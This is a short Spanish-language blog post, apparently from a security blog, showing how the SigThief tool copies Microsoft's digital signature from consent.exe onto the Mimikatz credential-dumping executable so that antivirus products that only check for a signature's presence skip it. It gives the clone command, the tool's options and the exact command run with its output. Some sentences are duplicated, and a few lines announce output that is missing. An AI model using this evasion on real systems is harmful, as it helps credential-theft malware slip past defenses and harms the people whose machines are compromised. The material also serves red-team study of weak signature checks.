Desde las Altas Tierras nos llegaba un telegrama curioso con un tweet de subTee en el que decía estampar la firma digital de Microsoft en el ejecutable de Mimikatz. ¿Y para qué? Pues aunque parezca mentira me pongo colorada todavía hoy en día muchos antivirus se pasan por el forro de la indetección aquellos ejecutables (PE) que estén firmados digitalmente por, digamos, autoridades de certificación de renombre como M$ (tito Gates approved), y lo más importante, independientemente si la firma es válida o no, es decir, sólo comprueban que la certTable tiene algún valor.
La herramienta que "traslada" la firma digital de un ejecutable a otro es SigThief de Josh Pitts aka secretsquirrel:
Su sintaxis es muy sencilla:
Para ver un poco su uso, copiaremos la firma del ejecutable de Güindous 'consent.exe' al ejecutable 'mimikatz.exe'.
Primero echamos un vistazo al binario original:
Luego usamos SigThief para copiar su firma al ejecutable de Mimikatz:
La herramienta que "traslada" la firma digital de un ejecutable a otro es SigThief de Josh Pitts aka secretsquirrel:
$ git clone https://github.com/secretsquirrel/SigThief.git
Su sintaxis es muy sencilla:
Usage: sigthief.py [options]
Options:
-h, --help show this help message and exit
-i FILE, --file=FILE file still signature from
-r, --rip rip signature off inputfile
-a, --add add signautre to targetfile
-o OUTPUTFILE, --output=OUTPUTFILE
output file
-s SIGFILE, --sig=SIGFILE
binary signature from disk
-t TARGETFILE, --target=TARGETFILE
file to append signature too
-c, --checksig file to check if signed; does not verify signature
-T, --truncate truncate signature (i.e. remove sig)
Para ver un poco su uso, copiaremos la firma del ejecutable de Güindous 'consent.exe' al ejecutable 'mimikatz.exe'.
Primero echamos un vistazo al binario original:
Luego usamos SigThief para copiar su firma al ejecutable de Mimikatz:
$ cd SigThief
$ python sigthief.py -i ./pruebas/consent.exe -t ./pruebas/mimikatz.exe -o /tmp/mimikatz_firmado.exe
Output file: /tmp/mimikatz_firmado.exe
Signature appended.
FIN.